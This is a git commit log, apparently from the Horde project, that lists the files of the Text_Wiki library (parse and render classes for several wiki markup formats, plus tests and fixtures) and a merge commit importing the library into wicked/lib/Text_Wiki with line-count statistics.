 create mode 100644 Text/Wiki/Render/Creole/Code.php
 create mode 100644 Text/Wiki/Render/Creole/Colortext.php
 create mode 100644 Text/Wiki/Render/Creole/Deflist.php
 create mode 100644 Text/Wiki/Render/Creole/Delimiter.php
 create mode 100644 Text/Wiki/Render/Creole/Embed.php
 create mode 100644 Text/Wiki/Render/Creole/Emphasis.php
 create mode 100644 Text/Wiki/Render/Creole/Freelink.php
 create mode 100644 Text/Wiki/Render/Creole/Function.php
 create mode 100644 Text/Wiki/Render/Creole/Heading.php
 create mode 100644 Text/Wiki/Render/Creole/Horiz.php
 create mode 100644 Text/Wiki/Render/Creole/Html.php
 create mode 100644 Text/Wiki/Render/Creole/Image.php
 create mode 100644 Text/Wiki/Render/Creole/Include.php
 create mode 100644 Text/Wiki/Render/Creole/Interwiki.php
 create mode 100644 Text/Wiki/Render/Creole/Italic.php
 create mode 100644 Text/Wiki/Render/Creole/List.php
 create mode 100644 Text/Wiki/Render/Creole/Newline.php
 create mode 100644 Text/Wiki/Render/Creole/Paragraph.php
 create mode 100644 Text/Wiki/Render/Creole/Phplookup.php
 create mode 100644 Text/Wiki/Render/Creole/Prefilter.php
 create mode 100644 Text/Wiki/Render/Creole/Preformatted.php
 create mode 100644 Text/Wiki/Render/Creole/Raw.php
 create mode 100644 Text/Wiki/Render/Creole/Revise.php
 create mode 100644 Text/Wiki/Render/Creole/Strong.php
 create mode 100644 Text/Wiki/Render/Creole/Subscript.php
 create mode 100644 Text/Wiki/Render/Creole/Superscript.php
 create mode 100644 Text/Wiki/Render/Creole/Table.php
 create mode 100644 Text/Wiki/Render/Creole/Tighten.php
 create mode 100644 Text/Wiki/Render/Creole/Toc.php
 create mode 100644 Text/Wiki/Render/Creole/Tt.php
 create mode 100644 Text/Wiki/Render/Creole/Underline.php
 create mode 100644 Text/Wiki/Render/Creole/Url.php
 create mode 100644 Text/Wiki/Render/Creole/Wikilink.php
 create mode 100644 Text/Wiki/Render/Docbook.php
 create mode 100644 Text/Wiki/Render/Docbook/Anchor.php
 create mode 100644 Text/Wiki/Render/Docbook/Blockquote.php
 create mode 100644 Text/Wiki/Render/Docbook/Bold.php
 create mode 100644 Text/Wiki/Render/Docbook/Box.php
 create mode 100644 Text/Wiki/Render/Docbook/Break.php
 create mode 100644 Text/Wiki/Render/Docbook/Center.php
 create mode 100644 Text/Wiki/Render/Docbook/Code.php
 create mode 100644 Text/Wiki/Render/Docbook/Colortext.php
 create mode 100644 Text/Wiki/Render/Docbook/Deflist.php
 create mode 100644 Text/Wiki/Render/Docbook/Delimiter.php
 create mode 100644 Text/Wiki/Render/Docbook/Embed.php
 create mode 100644 Text/Wiki/Render/Docbook/Emphasis.php
 create mode 100644 Text/Wiki/Render/Docbook/Font.php
 create mode 100644 Text/Wiki/Render/Docbook/Freelink.php
 create mode 100644 Text/Wiki/Render/Docbook/Function.php
 create mode 100644 Text/Wiki/Render/Docbook/Heading.php
 create mode 100644 Text/Wiki/Render/Docbook/Horiz.php
 create mode 100644 Text/Wiki/Render/Docbook/Html.php
 create mode 100644 Text/Wiki/Render/Docbook/Image.php
 create mode 100644 Text/Wiki/Render/Docbook/Include.php
 create mode 100644 Text/Wiki/Render/Docbook/Interwiki.php
 create mode 100644 Text/Wiki/Render/Docbook/Italic.php
 create mode 100644 Text/Wiki/Render/Docbook/List.php
 create mode 100644 Text/Wiki/Render/Docbook/Newline.php
 create mode 100644 Text/Wiki/Render/Docbook/Page.php
 create mode 100644 Text/Wiki/Render/Docbook/Paragraph.php
 create mode 100644 Text/Wiki/Render/Docbook/Phplookup.php
 create mode 100644 Text/Wiki/Render/Docbook/Plugin.php
 create mode 100644 Text/Wiki/Render/Docbook/Prefilter.php
 create mode 100644 Text/Wiki/Render/Docbook/Preformatted.php
 create mode 100644 Text/Wiki/Render/Docbook/Raw.php
 create mode 100644 Text/Wiki/Render/Docbook/Revise.php
 create mode 100644 Text/Wiki/Render/Docbook/Smiley.php
 create mode 100644 Text/Wiki/Render/Docbook/Specialchar.php
 create mode 100644 Text/Wiki/Render/Docbook/Strong.php
 create mode 100644 Text/Wiki/Render/Docbook/Subscript.php
 create mode 100644 Text/Wiki/Render/Docbook/Superscript.php
 create mode 100644 Text/Wiki/Render/Docbook/Table.php
 create mode 100644 Text/Wiki/Render/Docbook/Tighten.php
 create mode 100644 Text/Wiki/Render/Docbook/Titlebar.php
 create mode 100644 Text/Wiki/Render/Docbook/Toc.php
 create mode 100644 Text/Wiki/Render/Docbook/Tt.php
 create mode 100644 Text/Wiki/Render/Docbook/Underline.php
 create mode 100644 Text/Wiki/Render/Docbook/Url.php
 create mode 100644 Text/Wiki/Render/Docbook/Wikilink.php
 create mode 100644 Text/Wiki/Render/Doku.php
 create mode 100644 Text/Wiki/Render/Doku/Anchor.php
 create mode 100644 Text/Wiki/Render/Doku/Blockquote.php
 create mode 100644 Text/Wiki/Render/Doku/Bold.php
 create mode 100644 Text/Wiki/Render/Doku/Box.php
 create mode 100644 Text/Wiki/Render/Doku/Break.php
 create mode 100644 Text/Wiki/Render/Doku/Center.php
 create mode 100644 Text/Wiki/Render/Doku/Code.php
 create mode 100644 Text/Wiki/Render/Doku/Colortext.php
 create mode 100644 Text/Wiki/Render/Doku/Deflist.php
 create mode 100644 Text/Wiki/Render/Doku/Delimiter.php
 create mode 100644 Text/Wiki/Render/Doku/Embed.php
 create mode 100644 Text/Wiki/Render/Doku/Emphasis.php
 create mode 100644 Text/Wiki/Render/Doku/Freelink.php
 create mode 100644 Text/Wiki/Render/Doku/Function.php
 create mode 100644 Text/Wiki/Render/Doku/Heading.php
 create mode 100644 Text/Wiki/Render/Doku/Horiz.php
 create mode 100644 Text/Wiki/Render/Doku/Html.php
 create mode 100644 Text/Wiki/Render/Doku/Image.php
 create mode 100644 Text/Wiki/Render/Doku/Include.php
 create mode 100644 Text/Wiki/Render/Doku/Interwiki.php
 create mode 100644 Text/Wiki/Render/Doku/Italic.php
 create mode 100644 Text/Wiki/Render/Doku/List.php
 create mode 100644 Text/Wiki/Render/Doku/Newline.php
 create mode 100644 Text/Wiki/Render/Doku/Paragraph.php
 create mode 100644 Text/Wiki/Render/Doku/Phplookup.php
 create mode 100644 Text/Wiki/Render/Doku/Prefilter.php
 create mode 100644 Text/Wiki/Render/Doku/Raw.php
 create mode 100644 Text/Wiki/Render/Doku/Revise.php
 create mode 100644 Text/Wiki/Render/Doku/Strong.php
 create mode 100755 Text/Wiki/Render/Doku/Subscript.php
 create mode 100644 Text/Wiki/Render/Doku/Superscript.php
 create mode 100644 Text/Wiki/Render/Doku/Table.php
 create mode 100644 Text/Wiki/Render/Doku/Tighten.php
 create mode 100644 Text/Wiki/Render/Doku/Toc.php
 create mode 100644 Text/Wiki/Render/Doku/Tt.php
 create mode 100644 Text/Wiki/Render/Doku/Underline.php
 create mode 100644 Text/Wiki/Render/Doku/Url.php
 create mode 100644 Text/Wiki/Render/Doku/Wikilink.php
 create mode 100644 Text/Wiki/Render/Latex.php
 create mode 100644 Text/Wiki/Render/Latex/Anchor.php
 create mode 100644 Text/Wiki/Render/Latex/Blockquote.php
 create mode 100644 Text/Wiki/Render/Latex/Bold.php
 create mode 100644 Text/Wiki/Render/Latex/Box.php
 create mode 100644 Text/Wiki/Render/Latex/Break.php
 create mode 100644 Text/Wiki/Render/Latex/Center.php
 create mode 100644 Text/Wiki/Render/Latex/Code.php
 create mode 100644 Text/Wiki/Render/Latex/Colortext.php
 create mode 100644 Text/Wiki/Render/Latex/Deflist.php
 create mode 100644 Text/Wiki/Render/Latex/Delimiter.php
 create mode 100644 Text/Wiki/Render/Latex/Embed.php
 create mode 100644 Text/Wiki/Render/Latex/Emphasis.php
 create mode 100644 Text/Wiki/Render/Latex/Font.php
 create mode 100644 Text/Wiki/Render/Latex/Freelink.php
 create mode 100644 Text/Wiki/Render/Latex/Function.php
 create mode 100644 Text/Wiki/Render/Latex/Heading.php
 create mode 100644 Text/Wiki/Render/Latex/Horiz.php
 create mode 100644 Text/Wiki/Render/Latex/Html.php
 create mode 100644 Text/Wiki/Render/Latex/Image.php
 create mode 100644 Text/Wiki/Render/Latex/Include.php
 create mode 100644 Text/Wiki/Render/Latex/Interwiki.php
 create mode 100644 Text/Wiki/Render/Latex/Italic.php
 create mode 100644 Text/Wiki/Render/Latex/List.php
 create mode 100644 Text/Wiki/Render/Latex/Newline.php
 create mode 100644 Text/Wiki/Render/Latex/Page.php
 create mode 100644 Text/Wiki/Render/Latex/Paragraph.php
 create mode 100644 Text/Wiki/Render/Latex/Phplookup.php
 create mode 100644 Text/Wiki/Render/Latex/Plugin.php
 create mode 100644 Text/Wiki/Render/Latex/Prefilter.php
 create mode 100644 Text/Wiki/Render/Latex/Preformatted.php
 create mode 100644 Text/Wiki/Render/Latex/Raw.php
 create mode 100644 Text/Wiki/Render/Latex/Revise.php
 create mode 100644 Text/Wiki/Render/Latex/Smiley.php
 create mode 100644 Text/Wiki/Render/Latex/Specialchar.php
 create mode 100644 Text/Wiki/Render/Latex/Strong.php
 create mode 100644 Text/Wiki/Render/Latex/Subscript.php
 create mode 100644 Text/Wiki/Render/Latex/Superscript.php
 create mode 100644 Text/Wiki/Render/Latex/Table.php
 create mode 100644 Text/Wiki/Render/Latex/Tighten.php
 create mode 100644 Text/Wiki/Render/Latex/Titlebar.php
 create mode 100644 Text/Wiki/Render/Latex/Toc.php
 create mode 100644 Text/Wiki/Render/Latex/Tt.php
 create mode 100644 Text/Wiki/Render/Latex/Underline.php
 create mode 100644 Text/Wiki/Render/Latex/Url.php
 create mode 100644 Text/Wiki/Render/Latex/Wikilink.php
 create mode 100644 Text/Wiki/Render/Plain.php
 create mode 100644 Text/Wiki/Render/Plain/Anchor.php
 create mode 100644 Text/Wiki/Render/Plain/Blockquote.php
 create mode 100644 Text/Wiki/Render/Plain/Bold.php
 create mode 100644 Text/Wiki/Render/Plain/Box.php
 create mode 100644 Text/Wiki/Render/Plain/Break.php
 create mode 100644 Text/Wiki/Render/Plain/Center.php
 create mode 100644 Text/Wiki/Render/Plain/Code.php
 create mode 100644 Text/Wiki/Render/Plain/Colortext.php
 create mode 100644 Text/Wiki/Render/Plain/Deflist.php
 create mode 100644 Text/Wiki/Render/Plain/Delimiter.php
 create mode 100644 Text/Wiki/Render/Plain/Embed.php
 create mode 100644 Text/Wiki/Render/Plain/Emphasis.php
 create mode 100644 Text/Wiki/Render/Plain/Font.php
 create mode 100644 Text/Wiki/Render/Plain/Freelink.php
 create mode 100644 Text/Wiki/Render/Plain/Function.php
 create mode 100644 Text/Wiki/Render/Plain/Heading.php
 create mode 100644 Text/Wiki/Render/Plain/Horiz.php
 create mode 100644 Text/Wiki/Render/Plain/Html.php
 create mode 100644 Text/Wiki/Render/Plain/Image.php
 create mode 100644 Text/Wiki/Render/Plain/Include.php
 create mode 100644 Text/Wiki/Render/Plain/Interwiki.php
 create mode 100644 Text/Wiki/Render/Plain/Italic.php
 create mode 100644 Text/Wiki/Render/Plain/List.php
 create mode 100644 Text/Wiki/Render/Plain/Newline.php
 create mode 100644 Text/Wiki/Render/Plain/Page.php
 create mode 100644 Text/Wiki/Render/Plain/Paragraph.php
 create mode 100644 Text/Wiki/Render/Plain/Phplookup.php
 create mode 100644 Text/Wiki/Render/Plain/Plugin.php
 create mode 100644 Text/Wiki/Render/Plain/Prefilter.php
 create mode 100644 Text/Wiki/Render/Plain/Preformatted.php
 create mode 100644 Text/Wiki/Render/Plain/Raw.php
 create mode 100644 Text/Wiki/Render/Plain/Revise.php
 create mode 100644 Text/Wiki/Render/Plain/Smiley.php
 create mode 100644 Text/Wiki/Render/Plain/Specialchar.php
 create mode 100644 Text/Wiki/Render/Plain/Strong.php
 create mode 100644 Text/Wiki/Render/Plain/Subscript.php
 create mode 100644 Text/Wiki/Render/Plain/Superscript.php
 create mode 100644 Text/Wiki/Render/Plain/Table.php
 create mode 100644 Text/Wiki/Render/Plain/Tighten.php
 create mode 100644 Text/Wiki/Render/Plain/Titlebar.php
 create mode 100644 Text/Wiki/Render/Plain/Toc.php
 create mode 100644 Text/Wiki/Render/Plain/Tt.php
 create mode 100644 Text/Wiki/Render/Plain/Underline.php
 create mode 100644 Text/Wiki/Render/Plain/Url.php
 create mode 100644 Text/Wiki/Render/Plain/Wikilink.php
 create mode 100644 Text/Wiki/Render/Tiki.php
 create mode 100644 Text/Wiki/Render/Tiki/Anchor.php
 create mode 100644 Text/Wiki/Render/Tiki/Blockquote.php
 create mode 100644 Text/Wiki/Render/Tiki/Bold.php
 create mode 100644 Text/Wiki/Render/Tiki/Box.php
 create mode 100644 Text/Wiki/Render/Tiki/Break.php
 create mode 100644 Text/Wiki/Render/Tiki/Center.php
 create mode 100644 Text/Wiki/Render/Tiki/Code.php
 create mode 100644 Text/Wiki/Render/Tiki/Colortext.php
 create mode 100644 Text/Wiki/Render/Tiki/Deflist.php
 create mode 100644 Text/Wiki/Render/Tiki/Delimiter.php
 create mode 100644 Text/Wiki/Render/Tiki/Embed.php
 create mode 100644 Text/Wiki/Render/Tiki/Emphasis.php
 create mode 100644 Text/Wiki/Render/Tiki/Freelink.php
 create mode 100644 Text/Wiki/Render/Tiki/Function.php
 create mode 100755 Text/Wiki/Render/Tiki/Heading.php
 create mode 100644 Text/Wiki/Render/Tiki/Horiz.php
 create mode 100644 Text/Wiki/Render/Tiki/Html.php
 create mode 100644 Text/Wiki/Render/Tiki/Image.php
 create mode 100644 Text/Wiki/Render/Tiki/Include.php
 create mode 100644 Text/Wiki/Render/Tiki/Interwiki.php
 create mode 100644 Text/Wiki/Render/Tiki/Italic.php
 create mode 100644 Text/Wiki/Render/Tiki/List.php
 create mode 100644 Text/Wiki/Render/Tiki/Newline.php
 create mode 100644 Text/Wiki/Render/Tiki/Paragraph.php
 create mode 100644 Text/Wiki/Render/Tiki/Phplookup.php
 create mode 100644 Text/Wiki/Render/Tiki/Prefilter.php
 create mode 100644 Text/Wiki/Render/Tiki/Preformatted.php
 create mode 100644 Text/Wiki/Render/Tiki/Raw.php
 create mode 100644 Text/Wiki/Render/Tiki/Redirect.php
 create mode 100644 Text/Wiki/Render/Tiki/Revise.php
 create mode 100644 Text/Wiki/Render/Tiki/Strong.php
 create mode 100755 Text/Wiki/Render/Tiki/Subscript.php
 create mode 100644 Text/Wiki/Render/Tiki/Superscript.php
 create mode 100644 Text/Wiki/Render/Tiki/Table.php
 create mode 100644 Text/Wiki/Render/Tiki/Tighten.php
 create mode 100644 Text/Wiki/Render/Tiki/Toc.php
 create mode 100644 Text/Wiki/Render/Tiki/Tt.php
 create mode 100644 Text/Wiki/Render/Tiki/Underline.php
 create mode 100644 Text/Wiki/Render/Tiki/Url.php
 create mode 100644 Text/Wiki/Render/Tiki/Wikilink.php
 create mode 100644 Text/Wiki/Render/Xhtml.php
 create mode 100644 Text/Wiki/Render/Xhtml/Address.php
 create mode 100644 Text/Wiki/Render/Xhtml/Anchor.php
 create mode 100644 Text/Wiki/Render/Xhtml/Blockquote.php
 create mode 100644 Text/Wiki/Render/Xhtml/Bold.php
 create mode 100644 Text/Wiki/Render/Xhtml/Box.php
 create mode 100644 Text/Wiki/Render/Xhtml/Break.php
 create mode 100644 Text/Wiki/Render/Xhtml/Center.php
 create mode 100644 Text/Wiki/Render/Xhtml/Code.php
 create mode 100644 Text/Wiki/Render/Xhtml/Colortext.php
 create mode 100644 Text/Wiki/Render/Xhtml/Deflist.php
 create mode 100644 Text/Wiki/Render/Xhtml/Delimiter.php
 create mode 100644 Text/Wiki/Render/Xhtml/Embed.php
 create mode 100644 Text/Wiki/Render/Xhtml/Emphasis.php
 create mode 100644 Text/Wiki/Render/Xhtml/Font.php
 create mode 100644 Text/Wiki/Render/Xhtml/Freelink.php
 create mode 100644 Text/Wiki/Render/Xhtml/Function.php
 create mode 100644 Text/Wiki/Render/Xhtml/Heading.php
 create mode 100644 Text/Wiki/Render/Xhtml/Horiz.php
 create mode 100644 Text/Wiki/Render/Xhtml/Html.php
 create mode 100644 Text/Wiki/Render/Xhtml/Image.php
 create mode 100644 Text/Wiki/Render/Xhtml/Include.php
 create mode 100644 Text/Wiki/Render/Xhtml/Interwiki.php
 create mode 100644 Text/Wiki/Render/Xhtml/Italic.php
 create mode 100644 Text/Wiki/Render/Xhtml/List.php
 create mode 100644 Text/Wiki/Render/Xhtml/Newline.php
 create mode 100644 Text/Wiki/Render/Xhtml/Page.php
 create mode 100644 Text/Wiki/Render/Xhtml/Paragraph.php
 create mode 100644 Text/Wiki/Render/Xhtml/Phplookup.php
 create mode 100644 Text/Wiki/Render/Xhtml/Plugin.php
 create mode 100644 Text/Wiki/Render/Xhtml/Prefilter.php
 create mode 100644 Text/Wiki/Render/Xhtml/Preformatted.php
 create mode 100644 Text/Wiki/Render/Xhtml/Raw.php
 create mode 100644 Text/Wiki/Render/Xhtml/Revise.php
 create mode 100644 Text/Wiki/Render/Xhtml/Smiley.php
 create mode 100644 Text/Wiki/Render/Xhtml/Specialchar.php
 create mode 100644 Text/Wiki/Render/Xhtml/Strong.php
 create mode 100644 Text/Wiki/Render/Xhtml/Subscript.php
 create mode 100644 Text/Wiki/Render/Xhtml/Superscript.php
 create mode 100644 Text/Wiki/Render/Xhtml/Table.php
 create mode 100644 Text/Wiki/Render/Xhtml/Tighten.php
 create mode 100644 Text/Wiki/Render/Xhtml/Titlebar.php
 create mode 100644 Text/Wiki/Render/Xhtml/Toc.php
 create mode 100644 Text/Wiki/Render/Xhtml/Tt.php
 create mode 100644 Text/Wiki/Render/Xhtml/Underline.php
 create mode 100644 Text/Wiki/Render/Xhtml/Url.php
 create mode 100644 Text/Wiki/Render/Xhtml/Wikilink.php
 create mode 100644 Text/Wiki/Tiki.php
 create mode 100644 composer.json
 create mode 100644 doc/BBCodeParser.php
 create mode 100644 doc/BBCodeParser_V2.ini
 create mode 100644 doc/BBtest.txt
 create mode 100644 doc/README_BBCodeParser
 create mode 100644 doc/parser.php
 create mode 100644 doc/test_Text_Wiki.php
 create mode 100644 package.xml
 create mode 100644 packageBBCode.xml
 create mode 100644 packageCowiki.xml
 create mode 100644 packageCreole.xml
 create mode 100644 packageDoku.xml
 create mode 100644 packageMediawiki.xml
 create mode 100644 packageTiki.xml
 create mode 100644 tests/AllTests.php
 create mode 100644 tests/BBCode/7908.phpt
 create mode 100644 tests/Cowiki_Render_Url.phpt
 create mode 100644 tests/Creole_Parse_Url.phpt
 create mode 100644 tests/Creole_Render_Url.phpt
 create mode 100644 tests/Default_Parse_BlockQuote.phpt
 create mode 100644 tests/Docbook_Render_Url.phpt
 create mode 100644 tests/Doku_Render_Url.phpt
 create mode 100644 tests/Latex_Render_Url.phpt
 create mode 100644 tests/Plain_Render_Url.phpt
 create mode 100644 tests/Text_Wiki_BugTests.php
 create mode 100644 tests/Text_Wiki_Generic_Transform_Tests.php
 create mode 100644 tests/Text_Wiki_Parse_Mediawiki_Tests.php
 create mode 100644 tests/Text_Wiki_Parse_Tiki_Tests.php
 create mode 100644 tests/Text_Wiki_Render_Tests.php
 create mode 100644 tests/Text_Wiki_Render_Tiki_Tests.php
 create mode 100644 tests/Text_Wiki_Tests.php
 create mode 100644 tests/Xhtml_Render_Url.phpt
 create mode 100644 tests/fixtures/bug11649.txt
 create mode 100644 tests/fixtures/mediawiki_syntax.txt
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_preformatted.txt
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_raw.txt
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_wikilink.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_lists_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_lists_source.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_redirect_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_redirect_source.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_source.txt
 create mode 100644 tests/fixtures/test_mediawiki_wikilink_expected_matches.php
 create mode 100644 tests/fixtures/test_tiki_heading_expected_matches.php
 create mode 100644 tests/fixtures/test_tiki_to_tiki_heading_source.txt
 create mode 100644 tests/fixtures/text_wiki_sample_mediawiki_syntax.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_plain.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_plain2.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_xhtml.txt
 create mode 100644 tests/fixtures/tiki_syntax.txt

http://github.com/horde/horde/commit/1ef5c58c4803938f47cd76d72536248f6f2b6d91

-----------------------------------------------------------------------

commit 100041132db172e2e88fc12b8c6d0bfc4e309d18
Merge: 4a6e486 1ef5c58
Author: Jan Schneider 
Date:   Wed Sep 6 11:00:10 2017 +0200

    Merge commit '1ef5c58c4803938f47cd76d72536248f6f2b6d91' as 'wicked/lib/Text_Wiki'

 wicked/lib/Text_Wiki/.gitignore                    |    4 +
 wicked/lib/Text_Wiki/.travis.yml                   |    7 +
 wicked/lib/Text_Wiki/Text/Wiki.php                 | 1539 ++++++++++++++++++++
 wicked/lib/Text_Wiki/Text/Wiki/BBCode.php          |  100 ++
 wicked/lib/Text_Wiki/Text/Wiki/Cowiki.php          |   43 +
 wicked/lib/Text_Wiki/Text/Wiki/Creole.php          |  150 ++
 wicked/lib/Text_Wiki/Text/Wiki/Default.php         |   27 +
 wicked/lib/Text_Wiki/Text/Wiki/Doku.php            |   43 +
 wicked/lib/Text_Wiki/Text/Wiki/Mediawiki.php       |   95 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse.php           |  264 ++++
 .../Text/Wiki/Parse/BBCode/Blockquote.php          |   91 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Bold.php  |   63 +
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Code.php  |   63 +
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Colortext.php |   92 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Font.php  |   87 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Image.php |  102 ++
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Italic.php    |   62 +
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/List.php  |  187 +++
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Subscript.php |   85 ++
 .../Text/Wiki/Parse/BBCode/Superscript.php         |   84 ++
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Underline.php |   63 +
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Url.php   |  185 +++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Anchor.php    |   88 ++
 .../Text/Wiki/Parse/Cowiki/Blockquote.php          |  180 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Bold.php  |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Break.php |   73 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Center.php    |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Code.php  |   99 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Colortext.php |   90 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Deflist.php   |  123 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Delimiter.php |   80 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Embed.php |  107 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Emphasis.php  |   81 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Freelink.php  |   74 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Function.php  |  142 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Heading.php   |  107 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Horiz.php |   70 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Html.php  |   76 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Image.php |   85 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Include.php   |  100 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Interwiki.php |  142 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Italic.php    |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/List.php  |  246 ++++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Newline.php   |   75 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Paragraph.php |  146 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Phplookup.php |   73 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Prefilter.php |   78 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Raw.php   |   72 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Revise.php    |  170 +++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Strong.php    |   85 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Subscript.php |   79 +
 .../Text/Wiki/Parse/Cowiki/Superscript.php         |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Table.php |  214 +++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Tighten.php   |   49 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Toc.php   |   93 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Tt.php |   84 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Underline.php |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Url.php   |  281 ++++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Wikilink.php  |  227 +++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Address.php   |   67 +
 .../Text/Wiki/Parse/Creole/Blockquote.php          |  176 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Bold.php  |   82 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Box.php   |   81 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Break.php |   73 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Center.php    |   78 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Deflist.php   |  129 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Delimiter.php |   68 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Emphasis.php  |   83 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Footnote.php  |   83 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Heading.php   |   97 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Horiz.php |   58 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Image.php |   69 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Italic.php    |   81 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/List.php  |  244 ++++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Newline.php   |   60 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Paragraph.php |  139 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Prefilter.php |   54 +
 .../Text/Wiki/Parse/Creole/Preformatted.php        |   68 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Raw.php   |   61 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Strong.php    |   84 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Subscript.php |   75 +
 .../Text/Wiki/Parse/Creole/Superscript.php         |   75 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Table.php |  207 +++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Tighten.php   |   37 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Trim.php  |   75 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Tt.php |   78 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Underline.php |   83 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Url.php   |  109 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Wikilink.php  |  322 ++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Anchor.php   |   87 ++
 .../Text/Wiki/Parse/Default/Blockquote.php         |  162 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Bold.php |   79 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Break.php    |   72 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Center.php   |   78 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Code.php |  100 ++
 .../Text/Wiki/Parse/Default/Colortext.php          |   89 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Deflist.php  |  122 ++
 .../Text/Wiki/Parse/Default/Delimiter.php          |   80 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Embed.php    |  106 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Emphasis.php |   85 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Freelink.php |  134 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Function.php |  141 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Heading.php  |  107 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Horiz.php    |   70 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Html.php |   75 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Image.php    |  136 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Include.php  |  100 ++
 .../Text/Wiki/Parse/Default/Interwiki.php          |  138 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Italic.php   |   85 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/List.php |  262 ++++
